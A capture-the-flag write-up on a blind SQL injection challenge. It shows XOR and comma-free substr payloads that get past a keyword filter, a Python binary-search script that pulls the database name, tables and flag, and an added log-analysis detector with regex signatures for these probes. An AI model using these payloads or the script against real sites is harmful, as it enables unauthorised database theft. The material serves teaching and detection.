Input 1^1^1:
Input 1^0^1:
The parameter filter blocks keywords such as limit, +, the single quote, the comma and ascii, so the idea is to bypass it with the comma-free form substr((database())from({})for(1)).
id=1^(ord(substr((database())from(1)for(1)))>23)^1
Normal response (1^1^1), so the ASCII code of the first character of the database name is greater than 23.
id=1^(ord(substr((database())from(1)for(1)))>123)^1
No response (1^0^1), so the ASCII code of the first character of the database name is less than 123.
Trying a binary-search blind injection; the script is as follows:
```python
import requests

# The leading space in the original URL string was a typo and has been removed.
url = 'http://2f7bbe27-e7d3-4b53-848f-77366c18e51b.chall.ctf.show/index.php?id=1'
flag = ''

for i in range(1, 50):
    # Binary search over the printable ASCII range for the i-th character.
    high = 127
    low = 32
    mid = (high + low) // 2
    while high > low:
        payload = "^(ord(substr((database())from({})for(1)))>{})^1".format(i, mid)
        # payload = "^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)in(database()))from({})for(1)))>{})^1".format(i, mid)
        # payload = "^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)in(0x666c6167))from({})for(1)))>{})^1".format(i, mid)
        # payload = "^(ord(substr((select(group_concat(flag))from(web1.flag))from({})for(1)))>{})^1".format(i, mid)
        s = requests.get(url=url + payload)
        # 'Rudyard' appears in the page only when the XOR condition is true (1^1^1).
        if 'Rudyard' in s.text:
            low = mid + 1
        else:
            high = mid
        mid = (high + low) // 2
    flag += chr(mid)
    print(flag)
```
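From the defender's side, the same probes are easy to spot in web-server access logs, as this added example (not part of the write-up) shows: a numeric allow-list on id rejects every payload above regardless of the keyword blocklist, and the substr-from-for / XOR signature explains the burst of requests a binary search produces. The log lines, the log format and the regular expressions are constructed for this illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the challenge); the last three
# mimic the XOR/substr-from-for probes described above, one of them URL-encoded.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00] "GET /index.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01] "GET /index.php?id=42 HTTP/1.1" 200 498',
    '10.0.0.9 - - [01/Jan/2024:10:00:02] "GET /index.php?id=1^(ord(substr((database())from(1)for(1)))>23)^1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02] "GET /index.php?id=1%5E(ord(substr((database())from(1)for(1)))%3E79)%5E1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:03] "GET /index.php?id=1^(ord(substr((database())from(2)for(1)))>79)^1 HTTP/1.1" 200 470',
]

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"GET (?P<target>\S+) HTTP/[\d.]+"')
# Signatures of the bypass shown in the write-up: comma-free substr() and XOR-wrapped comparisons.
SIGNATURES = [
    re.compile(r'substr\s*\(.*\bfrom\s*\(', re.I),
    re.compile(r'\^\s*\(.*[<>=]', re.I),
]


def classify(line):
    """Return (ip, reason) for a suspicious request, or None when the id looks benign."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    qs = parse_qs(urlsplit(m.group('target')).query)  # parse_qs percent-decodes values
    raw = qs.get('id', [''])[0]
    # Allow-list check: the handler expects a numeric id, so anything else is suspect.
    if raw.isdigit():
        return None
    for sig in SIGNATURES:
        if sig.search(raw):
            return m.group('ip'), 'blind-injection signature'
    return m.group('ip'), 'non-numeric id'


def analyze(lines):
    """Count suspicious requests per source IP; a binary search yields several per character."""
    hits = Counter()
    for line in lines:
        result = classify(line)
        if result:
            hits[result[0]] += 1
    return hits
```

Feeding the whole log through analyze() surfaces the single source that issued all three probes, which is the per-IP burst a blind binary search leaves behind.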